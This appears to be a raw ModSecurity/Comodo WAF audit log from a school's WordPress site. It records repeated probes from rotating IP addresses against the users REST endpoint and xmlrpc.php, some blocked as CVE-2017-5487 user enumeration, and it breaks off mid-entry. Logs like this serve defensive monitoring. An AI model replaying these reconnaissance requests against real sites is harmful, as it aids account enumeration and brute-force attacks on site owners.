[data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429922276517 6829 (- - -) Stopwatch2: 1747429922276517 6829; combined=4914, p1=708, p2=3955, p3=37, p4=45, p5=100, sr=167, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eb68459-Z-- --ca66835c-A-- [17/May/2025:04:12:32 +0700] aCeqQHyxdQCiyU1ENFchxwAAAAI 103.236.140.4 55696 103.236.140.4 8181 --ca66835c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ca66835c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca66835c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429952618308 3276 (- - -) Stopwatch2: 1747429952618308 3276; combined=1468, p1=475, p2=903, p3=0, p4=0, p5=90, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca66835c-Z-- --75fcf63a-A-- [17/May/2025:04:12:37 +0700] aCeqRXyxdQCiyU1ENFchyQAAAAQ 103.236.140.4 55700 103.236.140.4 8181 --75fcf63a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --75fcf63a-C-- demo.sayHello --75fcf63a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --75fcf63a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429957967983 6258 (- - -) Stopwatch2: 1747429957967983 6258; combined=4544, p1=612, p2=3753, p3=30, p4=35, p5=69, sr=81, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75fcf63a-Z-- --1f44874f-A-- [17/May/2025:04:12:54 +0700] aCeqVnyxdQCiyU1ENFchywAAAAc 103.236.140.4 55704 103.236.140.4 8181 --1f44874f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1f44874f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f44874f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429974021492 2815 (- - -) Stopwatch2: 1747429974021492 2815; combined=1276, p1=420, p2=827, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f44874f-Z-- --ee614c6a-A-- [17/May/2025:04:12:59 +0700] aCeqW3yxdQCiyU1ENFchzgAAAAw 103.236.140.4 55710 103.236.140.4 8181 --ee614c6a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee614c6a-C-- demo.sayHello --ee614c6a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee614c6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429979127908 4877 (- - -) Stopwatch2: 1747429979127908 4877; combined=3798, p1=481, p2=3107, p3=26, p4=30, p5=92, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee614c6a-Z-- --725f2f1f-A-- [17/May/2025:04:13:02 +0700] aCeqXnyxdQCiyU1ENFchzwAAAA0 103.236.140.4 55712 103.236.140.4 8181 --725f2f1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --725f2f1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --725f2f1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429982832628 2503 (- - -) Stopwatch2: 1747429982832628 2503; combined=1035, p1=351, p2=661, p3=0, p4=0, p5=23, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --725f2f1f-Z-- --e28a024b-A-- [17/May/2025:04:13:08 +0700] aCeqZHyxdQCiyU1ENFch0QAAABE 103.236.140.4 55718 103.236.140.4 8181 --e28a024b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e28a024b-C-- demo.sayHello --e28a024b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e28a024b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429988739667 18636 (- - -) Stopwatch2: 1747429988739667 18636; combined=29482, p1=618, p2=3485, p3=31, p4=42, p5=12668, sr=119, sw=66, l=0, gc=12572 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e28a024b-Z-- --dec3e547-A-- [17/May/2025:04:14:02 +0700] aCeqmnyxdQCiyU1ENFch2wAAAAk 103.236.140.4 55740 103.236.140.4 8181 --dec3e547-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --dec3e547-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dec3e547-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430042805437 2820 (- - -) Stopwatch2: 1747430042805437 2820; combined=1269, p1=420, p2=819, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dec3e547-Z-- --d34be913-A-- [17/May/2025:04:14:09 +0700] aCeqoXyxdQCiyU1ENFch3gAAAA4 103.236.140.4 55746 103.236.140.4 8181 --d34be913-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d34be913-C-- demo.sayHello --d34be913-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d34be913-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430049588551 6468 (- - -) Stopwatch2: 1747430049588551 6468; combined=4650, p1=618, p2=3791, p3=39, p4=44, p5=95, sr=80, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d34be913-Z-- --88a9185c-A-- [17/May/2025:04:14:28 +0700] aCeqtHyxdQCiyU1ENFch4QAAABI 103.236.140.4 55752 103.236.140.4 8181 --88a9185c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --88a9185c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88a9185c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430068113821 2905 (- - -) Stopwatch2: 1747430068113821 2905; combined=1275, p1=456, p2=788, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88a9185c-Z-- --a7ed9f2b-A-- [17/May/2025:04:14:33 +0700] aCequXyxdQCiyU1ENFch4wAAABQ 103.236.140.4 55756 103.236.140.4 8181 --a7ed9f2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7ed9f2b-C-- demo.sayHello --a7ed9f2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7ed9f2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430073385563 5672 (- - -) Stopwatch2: 1747430073385563 5672; combined=4159, p1=565, p2=3377, p3=31, p4=35, p5=90, sr=78, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7ed9f2b-Z-- --fe066478-A-- [17/May/2025:04:16:15 +0700] aCerH3yxdQCiyU1ENFch6wAAAAk 103.236.140.4 55774 103.236.140.4 8181 --fe066478-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe066478-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe066478-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430175019148 2786 (- - -) Stopwatch2: 1747430175019148 2786; combined=1232, p1=427, p2=775, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe066478-Z-- --1468d63e-A-- [17/May/2025:04:16:21 +0700] aCerJXyxdQCiyU1ENFch7QAAAAw 103.236.140.4 55778 103.236.140.4 8181 --1468d63e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1468d63e-C-- demo.sayHello --1468d63e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1468d63e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430181078320 5655 (- - -) Stopwatch2: 1747430181078320 5655; combined=4134, p1=543, p2=3367, p3=32, p4=35, p5=93, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1468d63e-Z-- --b41a1537-A-- [17/May/2025:04:18:55 +0700] aCervwTOsBn9MSWb6WJp3QAAAIk 103.236.140.4 55794 103.236.140.4 8181 --b41a1537-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.51.159.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.51.159.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b41a1537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b41a1537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430335352823 3082 (- - -) Stopwatch2: 1747430335352823 3082; combined=1290, p1=436, p2=825, p3=0, p4=0, p5=28, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b41a1537-Z-- --97501059-A-- [17/May/2025:04:22:41 +0700] aCesoXyxdQCiyU1ENFch9AAAAAE 103.236.140.4 55822 103.236.140.4 8181 --97501059-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --97501059-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97501059-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430561348021 3255 (- - -) Stopwatch2: 1747430561348021 3255; combined=1428, p1=494, p2=901, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97501059-Z-- --b83b4c7e-A-- [17/May/2025:04:22:49 +0700] aCesqXyxdQCiyU1ENFch9QAAAAI 103.236.140.4 55826 103.236.140.4 8181 --b83b4c7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b83b4c7e-C-- demo.sayHello --b83b4c7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b83b4c7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747430569279644 6449 (- - -) Stopwatch2: 1747430569279644 6449; combined=4645, p1=625, p2=3779, p3=38, p4=43, p5=97, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b83b4c7e-Z-- --e9eb3660-A-- [17/May/2025:04:28:33 +0700] aCeuAXyxdQCiyU1ENFciEgAAAA0 103.236.140.4 55896 103.236.140.4 8181 --e9eb3660-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e9eb3660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9eb3660-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747430913508227 2832 (- - -) Stopwatch2: 1747430913508227 2832; combined=1479, p1=512, p2=936, p3=0, p4=0, p5=31, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9eb3660-Z-- --355e7248-A-- [17/May/2025:04:28:38 +0700] aCeuBnyxdQCiyU1ENFciFAAAABI 103.236.140.4 55900 103.236.140.4 8181 --355e7248-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --355e7248-C-- demo.sayHello --355e7248-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --355e7248-H-- Message: Warning. Match of 